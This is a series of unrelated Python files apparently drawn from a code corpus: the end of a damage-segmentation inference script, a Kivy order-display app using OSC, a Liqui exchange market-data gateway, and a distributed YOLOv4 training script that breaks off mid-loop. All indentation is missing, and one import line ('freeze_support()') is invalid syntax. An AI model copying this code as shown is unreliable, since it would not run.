model_wrapper = ModelWrapper(model, args.is_use_gpu, config.MODEL.IS_SPLIT_LOSS)
model_wrapper.eval()
# Running inference
print('Running inference...')
results_list = run_inference(args, config, model_wrapper, eval_dataset, eval_dataloader)
# Running postprocessing
p = mp.Pool(args.n_procs)
f_p = partial(postprocess_and_write, config)
p.map(f_p, results_list)
if args.create_overlay_mosaic:
print("Creating overlay mosaic")
p = Path(args.output_directory) / "over"
overlay_files = get_files(p)
overlay_files = [x for x in overlay_files]
overlay_mosaic = create_mosaic(overlay_files, Path(f"{args.output_directory}/mosaics/overlay.tif"))
if args.create_shapefile:
print('Creating shapefile')
files = get_files(Path(args.output_directory) / 'dmg')
create_shapefile(files,
Path(args.output_directory).joinpath('shapes') / 'damage.shp',
args.destination_crs)
# Complete
print('Run complete!')
if __name__ == '__main__':
if os.name == 'nt':
from multiprocessing import freeze_support()
freeze_support()
main()
|
main.py
|
#!/usr/bin/env python
# coding=utf-8
# @Author: Manuel Rodriguez <valle>
# @Date: 02-May-2017
# @Email: valle.mrv@gmail.com
# @Last modified by: valle
# @Last modified time: 10-Mar-2018
# @License: Apache license vesion 2.0
import sys
import os
reload(sys)
sys.setdefaultencoding('UTF8')
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
os.chdir(BASE_DIR)
sys.path.insert(0, os.path.join(BASE_DIR, "valle_libs"))
sys.path.insert(0, os.path.join(BASE_DIR))
from kivy.app import App
from kivy.utils import platform
from kivy.uix.anchorlayout import AnchorLayout
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.network.urlrequest import UrlRequest
from kivy.lib import osc
from datetime import datetime
from kivy.logger import Logger
from models.pedidos import *
import json
import threading
import time
activityport = 3011
serviceport = 3010
Builder.load_string("""
#:import ValleListView components.listview
#:import BotonIcon components.buttons
#:import * components.labels
#:import res components.resources
<PedidosWidget>:
anchor_x: 'center'
anchor_y: 'center'
scroll: _scroll
view: _listado
ScrollView:
id: _scroll
size_hint: .99, .99
BoxLayout:
orientation: 'horizontal'
spacing: 5
size_hint: None, 1
width: len(self.children) * (root.width/4)
id: _listado
<PedidoWidget>:
canvas:
Color:
rgba: 0.2, 0.2, 0.2, 1
Rectangle:
size: self.size
pos: self.pos
texto: ""
lineas: _listview
orientation: 'vertical'
spacing: 5
size_hint: 1, 1
AnchorLayout:
anchor_x: 'center'
anchor_y: 'top'
size_hint: 1, .23
Label:
font_size: 12
size_hint: 1, 1
text: root.texto
text_size: self.size
halign: 'center'
valign: 'middle'
AnchorLayout:
anchor_x: 'center'
anchor_y: 'center'
ValleListView:
size_hint: 1, 1
id: _listview
cheight: '60dp'
AnchorLayout:
anchor_x: 'center'
anchor_y: 'top'
size_hint: 1, .2
BoxLayout:
orientation: 'vertical'
size_hint: .95, .95
LabelColor:
text: root.direccion
font_size: '12dp'
AnchorLayout:
anchor_x: 'center'
anchor_y: 'top'
size_hint: 1, .2
BoxLayout:
orientation: 'horizontal'
size_hint: .95, .95
Label:
text: "Borrar comada"
text_size: self.size
halign: 'center'
valign: 'middle'
ButtonIcon:
size_hint: None, .95
width: self.height
icon: res.FA_TRASH
font_size: "6dp"
on_press: root.rm(root, root.tag)
<LineaWidget>:
contenedor: None
color: "#b9b9b9"
tag: None
des: ''
spacing: 5
orientation: 'horizontal'
LabelClicable:
font_size: "15dp"
tag: root.tag
event: root.borrar
text: root.des
bgColor: root.color
on_release: root.borrar(root)
""")
class LineaWidget(BoxLayout):
borrar = ObjectProperty(None, allowNone=True)
class PedidoWidget(BoxLayout):
rm = ObjectProperty(None, allowNone=True)
tag = ObjectProperty(None, allowNone=True)
direccion = StringProperty("No hay direccion")
class PedidosWidget(AnchorLayout):
stop = threading.Event()
def __init__(self, **kargs):
super(PedidosWidget, self).__init__(**kargs)
Logger.debug('Cagada')
self.listapedidos = []
self.modify_pedidos = []
if platform == 'android':
from android import AndroidService
service = AndroidService('TpvB3 receptor', 'running')
service.start('service started')
self.service = service
else:
import os, threading
#threading.Thread(target=os.system, args=("python ./service/main.py",)).start()
osc.init()
oscid = osc.listen(ipAddr='127.0.0.1', port=activityport)
osc.bind(oscid, self.mostrar_pedidos, '/sync_pedidos')
Clock.schedule_interval(lambda *x: osc.readQueue(oscid), 0)
self.mostrar_pedidos('ok')
#self.lock = threading.Lock()
#threading.Thread(target=self.get_pedidos).start()
#Clock.schedule_once(self.mostra_pedidos, 5)
def servido(self, root):
tag = root.tag
s = tag.servido
s = False if s == True else True
tag.servido = s
tag.save()
osc.sendMsg('/servidor_men', ['linea_servida',tag.id, tag.servido], port=serviceport)
root.color = '#beec90' if s == True else '#b9b9b9'
def rm(self, root, tag):
self.listapedidos.remove(tag.id)
osc.sendMsg('/servidor_men', ['pedido_servido',tag.id], port=serviceport)
tag.delete()
tag.servido = True
if tag.id in self.listapedidos:
self.listapedidos.remove(tag.id)
self.view.remove_widget(root)
def mostrar_pedidos(self, men, *args):
print("[DEBUG ] %s" % men)
pedidos = Pedidos.filter()
for p in pedidos:
if not p.id in self.listapedidos:
self.listapedidos.append(p.id)
ls = p.lineaspedido_set.get(query="imprimible=1")
if len(ls) > 0:
pedidowidget = PedidoWidget(rm=self.rm, tag=p)
fecha = p.fecha
fs = fecha.strftime("%d/%m/%Y %H:%M")
texto = "{0}\nnum: {1}\n{2}".format(fs,
p.num_avisador,
p.para_llevar)
pedidowidget.texto = texto
pedidowidget.direccion = p.direccion
for l in ls:
linea = LineaWidget(borrar=self.servido)
if l.servido == True:
linea.color = "#beec90"
linea.tag = l
linea.contenedor = pedidowidget
linea.des = "{0} {1} {2} {3}".format(l.cant, l.tipo, l.text, l.des)
pedidowidget.lineas.add_linea(linea)
self.view.add_widget(pedidowidget)
class AppRun(App):
service = ObjectProperty()
def build(self):
self.title = "Pedidos"
self.p = PedidosWidget()
if platform == 'android':
self.service = self.p.service
return self.p
def on_stop(self):
# The Kivy event loop is about to stop, set a stop signal;
# otherwise the app window will close, but the Python process will
# keep running until all secondary threads exit.
if platform == 'android':
self.p.service.stop()
osc.sendMsg('/servidor_men', ['finalizar',], port=serviceport)
def on_pause(self):
return True
if __name__ == '__main__':
from kivy.core.window import Window
Window.clearcolor = (1,1,1,1)
AppRun().run()
|
liqui.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from threading import Thread
import time
class ExchGwApiLiqui(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.liqui.io/api/3/depth/{0}".format(
instmt.get_instmt_code())
@classmethod
def get_trades_link(cls, instmt):
return "https://api.liqui.io/api/3/trades/{0}?limit=20".format(
(instmt.get_instmt_code()))
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
raw = raw[instmt.instmt_code]
keys = list(raw.keys())
if (cls.get_bids_field_name() in keys and
cls.get_asks_field_name() in keys):
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
res = res[instmt.instmt_code]
for i in range(0, len(res)):
t = res[len(res) - 1 - i]
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwLiqui(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiLiqui(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Liqui'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Thread(target=partial(self.get_order_book_worker, instmt))
t2 = Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Liqui'
instmt_name = 'ETHBTC'
instmt_code = 'eth_btc'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwLiqui([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
train.py
|
# -*- coding: utf-8 -*-
'''
@Time : 2020/05/06 15:07
@Author : Tianxiaomo
@File : train.py
@Noice :
@Modificattion :
@Author :
@Time :
@Detail :
'''
import time
import logging
import os, sys, math
import argparse
from collections import deque
import datetime
import cv2
from tqdm import tqdm
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torch import optim
from torch.nn import functional as F
from tensorboardX import SummaryWriter
from easydict import EasyDict as edict
from dataset import Yolo_dataset
from cfg import Cfg
from models import Yolov4
from tool.darknet2pytorch import Darknet
from tool.tv_reference.utils import collate_fn as val_collate
from tool.tv_reference.coco_utils import convert_to_coco_api
from tool.tv_reference.coco_eval import CocoEvaluator
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
import os
import json
import torch.multiprocessing as mp
def bboxes_iou(bboxes_a, bboxes_b, xyxy=True, GIoU=False, DIoU=False, CIoU=False):
"""Calculate the Intersection of Unions (IoUs) between bounding boxes.
IoU is calculated as a ratio of area of the intersection
and area of the union.
Args:
bbox_a (array): An array whose shape is :math:`(N, 4)`.
:math:`N` is the number of bounding boxes.
The dtype should be :obj:`numpy.float32`.
bbox_b (array): An array similar to :obj:`bbox_a`,
whose shape is :math:`(K, 4)`.
The dtype should be :obj:`numpy.float32`.
Returns:
array:
An array whose shape is :math:`(N, K)`. \
An element at index :math:`(n, k)` contains IoUs between \
:math:`n` th bounding box in :obj:`bbox_a` and :math:`k` th bounding \
box in :obj:`bbox_b`.
from: https://github.com/chainer/chainercv
https://github.com/ultralytics/yolov3/blob/eca5b9c1d36e4f73bf2f94e141d864f1c2739e23/utils/utils.py#L262-L282
"""
if bboxes_a.shape[1] != 4 or bboxes_b.shape[1] != 4:
raise IndexError
if xyxy:
# intersection top left
tl = torch.max(bboxes_a[:, None, :2], bboxes_b[:, :2])
# intersection bottom right
br = torch.min(bboxes_a[:, None, 2:], bboxes_b[:, 2:])
# convex (smallest enclosing box) top left and bottom right
con_tl = torch.min(bboxes_a[:, None, :2], bboxes_b[:, :2])
con_br = torch.max(bboxes_a[:, None, 2:], bboxes_b[:, 2:])
# centerpoint distance squared
rho2 = ((bboxes_a[:, None, 0] + bboxes_a[:, None, 2]) - (bboxes_b[:, 0] + bboxes_b[:, 2])) ** 2 / 4 + (
(bboxes_a[:, None, 1] + bboxes_a[:, None, 3]) - (bboxes_b[:, 1] + bboxes_b[:, 3])) ** 2 / 4
w1 = bboxes_a[:, 2] - bboxes_a[:, 0]
h1 = bboxes_a[:, 3] - bboxes_a[:, 1]
w2 = bboxes_b[:, 2] - bboxes_b[:, 0]
h2 = bboxes_b[:, 3] - bboxes_b[:, 1]
area_a = torch.prod(bboxes_a[:, 2:] - bboxes_a[:, :2], 1)
area_b = torch.prod(bboxes_b[:, 2:] - bboxes_b[:, :2], 1)
else:
# intersection top left
tl = torch.max((bboxes_a[:, None, :2] - bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] - bboxes_b[:, 2:] / 2))
# intersection bottom right
br = torch.min((bboxes_a[:, None, :2] + bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] + bboxes_b[:, 2:] / 2))
# convex (smallest enclosing box) top left and bottom right
con_tl = torch.min((bboxes_a[:, None, :2] - bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] - bboxes_b[:, 2:] / 2))
con_br = torch.max((bboxes_a[:, None, :2] + bboxes_a[:, None, 2:] / 2),
(bboxes_b[:, :2] + bboxes_b[:, 2:] / 2))
# centerpoint distance squared
rho2 = ((bboxes_a[:, None, :2] - bboxes_b[:, :2]) ** 2 / 4).sum(dim=-1)
w1 = bboxes_a[:, 2]
h1 = bboxes_a[:, 3]
w2 = bboxes_b[:, 2]
h2 = bboxes_b[:, 3]
area_a = torch.prod(bboxes_a[:, 2:], 1)
area_b = torch.prod(bboxes_b[:, 2:], 1)
en = (tl < br).type(tl.type()).prod(dim=2)
area_i = torch.prod(br - tl, 2) * en # * ((tl < br).all())
area_u = area_a[:, None] + area_b - area_i
iou = area_i / area_u
if GIoU or DIoU or CIoU:
if GIoU: # Generalized IoU https://arxiv.org/pdf/1902.09630.pdf
area_c = torch.prod(con_br - con_tl, 2) # convex area
return iou - (area_c - area_u) / area_c # GIoU
if DIoU or CIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
# convex diagonal squared
c2 = torch.pow(con_br - con_tl, 2).sum(dim=2) + 1e-16
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w1 / h1).unsqueeze(1) - torch.atan(w2 / h2), 2)
with torch.no_grad():
alpha = v / (1 - iou + v)
return iou - (rho2 / c2 + v * alpha) # CIoU
return iou
class Yolo_loss(nn.Module):
def __init__(self, n_classes=80, n_anchors=3, device=None, batch=2):
super(Yolo_loss, self).__init__()
self.device = device
self.strides = [8, 16, 32]
image_size = 608
self.n_classes = n_classes
self.n_anchors = n_anchors
self.anchors = [[12, 16], [19, 36], [40, 28], [36, 75], [76, 55], [72, 146], [142, 110], [192, 243], [459, 401]]
self.anch_masks = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
self.ignore_thre = 0.5
self.masked_anchors, self.ref_anchors, self.grid_x, self.grid_y, self.anchor_w, self.anchor_h = [], [], [], [], [], []
for i in range(3):
all_anchors_grid = [(w / self.strides[i], h / self.strides[i]) for w, h in self.anchors]
masked_anchors = np.array([all_anchors_grid[j] for j in self.anch_masks[i]], dtype=np.float32)
ref_anchors = np.zeros((len(all_anchors_grid), 4), dtype=np.float32)
ref_anchors[:, 2:] = np.array(all_anchors_grid, dtype=np.float32)
ref_anchors = torch.from_numpy(ref_anchors)
# calculate pred - xywh obj cls
fsize = image_size // self.strides[i]
grid_x = torch.arange(fsize, dtype=torch.float).repeat(batch, 3, fsize, 1).to(device)
grid_y = torch.arange(fsize, dtype=torch.float).repeat(batch, 3, fsize, 1).permute(0, 1, 3, 2).to(device)
anchor_w = torch.from_numpy(masked_anchors[:, 0]).repeat(batch, fsize, fsize, 1).permute(0, 3, 1, 2).to(
device)
anchor_h = torch.from_numpy(masked_anchors[:, 1]).repeat(batch, fsize, fsize, 1).permute(0, 3, 1, 2).to(
device)
self.masked_anchors.append(masked_anchors)
self.ref_anchors.append(ref_anchors)
self.grid_x.append(grid_x)
self.grid_y.append(grid_y)
self.anchor_w.append(anchor_w)
self.anchor_h.append(anchor_h)
def build_target(self, pred, labels, batchsize, fsize, n_ch, output_id):
# target assignment
tgt_mask = torch.zeros(batchsize, self.n_anchors, fsize, fsize, 4 + self.n_classes).to(device=self.device)
obj_mask = torch.ones(batchsize, self.n_anchors, fsize, fsize).to(device=self.device)
tgt_scale = torch.zeros(batchsize, self.n_anchors, fsize, fsize, 2).to(self.device)
target = torch.zeros(batchsize, self.n_anchors, fsize, fsize, n_ch).to(self.device)
# labels = labels.cpu().data
nlabel = (labels.sum(dim=2) > 0).sum(dim=1) # number of objects
truth_x_all = (labels[:, :, 2] + labels[:, :, 0]) / (self.strides[output_id] * 2)
truth_y_all = (labels[:, :, 3] + labels[:, :, 1]) / (self.strides[output_id] * 2)
truth_w_all = (labels[:, :, 2] - labels[:, :, 0]) / self.strides[output_id]
truth_h_all = (labels[:, :, 3] - labels[:, :, 1]) / self.strides[output_id]
truth_i_all = truth_x_all.to(torch.int16).cpu().numpy()
truth_j_all = truth_y_all.to(torch.int16).cpu().numpy()
for b in range(batchsize):
n = int(nlabel[b])
if n == 0:
continue
truth_box = torch.zeros(n, 4).to(self.device)
truth_box[:n, 2] = truth_w_all[b, :n]
truth_box[:n, 3] = truth_h_all[b, :n]
truth_i = truth_i_all[b, :n]
truth_j = truth_j_all[b, :n]
# calculate iou between truth and reference anchors
anchor_ious_all = bboxes_iou(truth_box.cpu(), self.ref_anchors[output_id], CIoU=True)
# temp = bbox_iou(truth_box.cpu(), self.ref_anchors[output_id])
best_n_all = anchor_ious_all.argmax(dim=1)
best_n = best_n_all % 3
best_n_mask = ((best_n_all == self.anch_masks[output_id][0]) |
(best_n_all == self.anch_masks[output_id][1]) |
(best_n_all == self.anch_masks[output_id][2]))
if sum(best_n_mask) == 0:
continue
truth_box[:n, 0] = truth_x_all[b, :n]
truth_box[:n, 1] = truth_y_all[b, :n]
pred_ious = bboxes_iou(pred[b].contiguous().view(-1, 4), truth_box, xyxy=False)
pred_best_iou, _ = pred_ious.max(dim=1)
pred_best_iou = (pred_best_iou > self.ignore_thre)
pred_best_iou = pred_best_iou.view(pred[b].shape[:3])
# set mask to zero (ignore) if pred matches truth
obj_mask[b] = ~ pred_best_iou
for ti in range(best_n.shape[0]):
if best_n_mask[ti] == 1:
i, j = truth_i[ti], truth_j[ti]
a = best_n[ti]
obj_mask[b, a, j, i] = 1
tgt_mask[b, a, j, i, :] = 1
target[b, a, j, i, 0] = truth_x_all[b, ti] - truth_x_all[b, ti].to(torch.int16).to(torch.float)
target[b, a, j, i, 1] = truth_y_all[b, ti] - truth_y_all[b, ti].to(torch.int16).to(torch.float)
target[b, a, j, i, 2] = torch.log(
truth_w_all[b, ti] / torch.Tensor(self.masked_anchors[output_id])[best_n[ti], 0] + 1e-16)
target[b, a, j, i, 3] = torch.log(
truth_h_all[b, ti] / torch.Tensor(self.masked_anchors[output_id])[best_n[ti], 1] + 1e-16)
target[b, a, j, i, 4] = 1
target[b, a, j, i, 5 + labels[b, ti, 4].to(torch.int16).cpu().numpy()] = 1
tgt_scale[b, a, j, i, :] = torch.sqrt(2 - truth_w_all[b, ti] * truth_h_all[b, ti] / fsize / fsize)
return obj_mask, tgt_mask, tgt_scale, target
def forward(self, xin, labels=None):
loss, loss_xy, loss_wh, loss_obj, loss_cls, loss_l2 = 0, 0, 0, 0, 0, 0
for output_id, output in enumerate(xin):
batchsize = output.shape[0]
fsize = output.shape[2]
n_ch = 5 + self.n_classes
output = output.view(batchsize, self.n_anchors, n_ch, fsize, fsize)
output = output.permute(0, 1, 3, 4, 2) # .contiguous()
# logistic activation for xy, obj, cls
output[..., np.r_[:2, 4:n_ch]] = torch.sigmoid(output[..., np.r_[:2, 4:n_ch]])
pred = output[..., :4].clone()
pred[..., 0] += self.grid_x[output_id]
pred[..., 1] += self.grid_y[output_id]
pred[..., 2] = torch.exp(pred[..., 2]) * self.anchor_w[output_id]
pred[..., 3] = torch.exp(pred[..., 3]) * self.anchor_h[output_id]
obj_mask, tgt_mask, tgt_scale, target = self.build_target(pred, labels, batchsize, fsize, n_ch, output_id)
# loss calculation
output[..., 4] *= obj_mask
output[..., np.r_[0:4, 5:n_ch]] *= tgt_mask
output[..., 2:4] *= tgt_scale
target[..., 4] *= obj_mask
target[..., np.r_[0:4, 5:n_ch]] *= tgt_mask
target[..., 2:4] *= tgt_scale
loss_xy += F.binary_cross_entropy(input=output[..., :2], target=target[..., :2],
weight=tgt_scale * tgt_scale, reduction='sum')
loss_wh += F.mse_loss(input=output[..., 2:4], target=target[..., 2:4], reduction='sum') / 2
loss_obj += F.binary_cross_entropy(input=output[..., 4], target=target[..., 4], reduction='sum')
loss_cls += F.binary_cross_entropy(input=output[..., 5:], target=target[..., 5:], reduction='sum')
loss_l2 += F.mse_loss(input=output, target=target, reduction='sum')
loss = loss_xy + loss_wh + loss_obj + loss_cls
return loss, loss_xy, loss_wh, loss_obj, loss_cls, loss_l2
def collate(batch):
images = []
bboxes = []
for img, box in batch:
images.append([img])
bboxes.append([box])
images = np.concatenate(images, axis=0)
images = images.transpose(0, 3, 1, 2)
images = torch.from_numpy(images).div(255.0)
bboxes = np.concatenate(bboxes, axis=0)
bboxes = torch.from_numpy(bboxes)
return images, bboxes
master = json.loads(os.environ['SM_TRAINING_ENV'])['master_hostname']
os.environ['MASTER_ADDR'] = master #args.hosts[0]
os.environ['MASTER_PORT'] = '23456'
world_size = 0
rank = 0
#def train(model, device, config, epochs=5, batch_size=1, save_cp=True, log_step=20, img_scale=0.5):
def train(local_rank, config):
global world_size, rank, logging, log_dir
epochs = config.epochs
save_cp = True
log_step = 20
hosts = json.loads(os.environ['SM_HOSTS'])
world_size = len(hosts) * config.gpu
os.environ['WORLD_SIZE'] = str(world_size)
rank = hosts.index(os.environ['SM_CURRENT_HOST']) * config.gpu + local_rank
os.environ['RANK'] = str(rank)
dist.init_process_group(backend='nccl', init_method='env://', rank=rank, world_size=world_size)
torch.cuda.set_device(local_rank)
config.batch //= world_size
config.batch = max(config.batch, 1)
logging.info(f"world_size:{world_size},rank={rank},local_rank={local_rank},batch={config.batch},master={master}")
config.TRAIN_EPOCHS = config.epochs
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
logging.info(f'Using device {device}')
if config.use_darknet_cfg:
model = Darknet(config.cfgfile)
else:
model = Yolov4(config.pretrained, n_classes=config.classes)
model = model.to(device)
model = DDP(model, device_ids=[local_rank], output_device=local_rank)
model.cuda(local_rank)
train_dataset = Yolo_dataset(config.train_label, config, train=True)
val_dataset = Yolo_dataset(config.val_label, config, train=False)
n_train = len(train_dataset)
n_val = len(val_dataset)
train_sampler = DistributedSampler(train_dataset)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=config.batch // config.subdivisions,
shuffle=False,
num_workers=config.workers,
pin_memory=True,
sampler=train_sampler,
drop_last=True, collate_fn=collate)
#train_loader = DataLoader(train_dataset, batch_size=config.batch // config.subdivisions, shuffle=True,
# num_workers=config.workers, pin_memory=True, drop_last=True, collate_fn=collate)
if rank == 0:
val_loader = DataLoader(val_dataset, batch_size=config.batch // config.subdivisions, shuffle=True, num_workers=config.workers,
pin_memory=True, drop_last=True, collate_fn=val_collate)
writer = SummaryWriter(log_dir=config.TRAIN_TENSORBOARD_DIR,
filename_suffix=f'OPT_{config.TRAIN_OPTIMIZER}_LR_{config.learning_rate}_BS_{config.batch}_Sub_{config.subdivisions}_Size_{config.width}',
comment=f'OPT_{config.TRAIN_OPTIMIZER}_LR_{config.learning_rate}_BS_{config.batch}_Sub_{config.subdivisions}_Size_{config.width}')
config.max_batches = int(epochs* len(train_loader.dataset)/config.batch)
step0 = int(config.max_batches * 0.8)
step1 = int(config.max_batches * 0.9)
config.steps = [step0, step1]
config.policy = config.steps
max_itr = epochs * n_train
# global_step = config.TRAIN_MINEPOCH * n_train
global_step = 0
logging.info(f'''Starting training:
Epochs: {epochs}
Batch size: {config.batch}
Subdivisions: {config.subdivisions}
Learning rate: {config.learning_rate}
Training size: {n_train}
Validation size: {n_val}
Checkpoints: {save_cp}
Device: {device.type}
Images size: {config.width}
Optimizer: {config.TRAIN_OPTIMIZER}
Dataset classes: {config.classes}
Train label path:{config.train_label}
Pretrained:
''')
# learning rate setup
def burnin_schedule(i):
if i < config.burn_in:
factor = pow(i / config.burn_in, 4)
elif i < config.steps[0]:
factor = 1.0
elif i < config.steps[1]:
factor = 0.1
else:
factor = 0.01
return factor
if config.TRAIN_OPTIMIZER.lower() == 'adam':
optimizer = optim.Adam(
model.parameters(),
lr=config.learning_rate / config.batch,
betas=(0.9, 0.999),
eps=1e-08,
)
elif config.TRAIN_OPTIMIZER.lower() == 'sgd':
optimizer = optim.SGD(
params=model.parameters(),
lr=config.learning_rate / config.batch,
momentum=config.momentum,
weight_decay=config.decay,
)
scheduler = optim.lr_scheduler.LambdaLR(optimizer, burnin_schedule)
criterion = Yolo_loss(device=device, batch=config.batch // config.subdivisions, n_classes=config.classes)
# scheduler = ReduceLROnPlateau(optimizer, mode='max', verbose=True, patience=6, min_lr=1e-7)
# scheduler = CosineAnnealingWarmRestarts(optimizer, 0.001, 1e-6, 20)
save_prefix = 'Yolov4_epoch'
saved_models = deque()
model.train()
for epoch in range(epochs):
epoch_loss = 0
epoch_step = 0
with tqdm(total=n_train, desc=f'Epoch {epoch + 1}/{epochs}', unit='img', ncols=50) as pbar:
for i, batch in enumerate(train_loader):
global_step += 1
epoch_step += 1
images = batch[0]
bboxes = batch[1]
images = images.to(device=device, dtype=torch.float32)
bboxes = bboxes.to(device=device)
bboxes_pred = model(images)
loss, loss_xy, loss_wh, loss_obj, loss_cls, loss_l2 = criterion(bboxes_pred, bboxes)
# loss = loss / config.subdivisions
loss.backward()
epoch_loss += loss.item()
if global_step % config.subdivisions == 0:
optimizer.step()
scheduler.step()
model.zero_grad()
if global_step % (log_step * config.subdivisions) == 0 and rank == 0:
writer.add_scalar('train/Loss', loss.item(), global_step)
writer.add_scalar('train/loss_xy', loss_xy.item(), global_step)
writer.add_scalar('train/loss_wh', loss_wh.item(), global_step)
writer.add_scalar('train/loss_obj', loss_obj.item(), global_step)
writer.add_scalar('train/loss_cls', loss_cls.item(), global_step)
writer.add_scalar('train/loss_l2', loss_l2.item(), global_step)
writer.add_scalar('lr', scheduler.get_lr()[0] * config.batch, global_step)
pbar.set_postfix(**{'loss (batch)': loss.item(), 'loss_xy': loss_xy.item(),
'loss_wh': loss_wh.item(),
'loss_obj': loss_obj.item(),
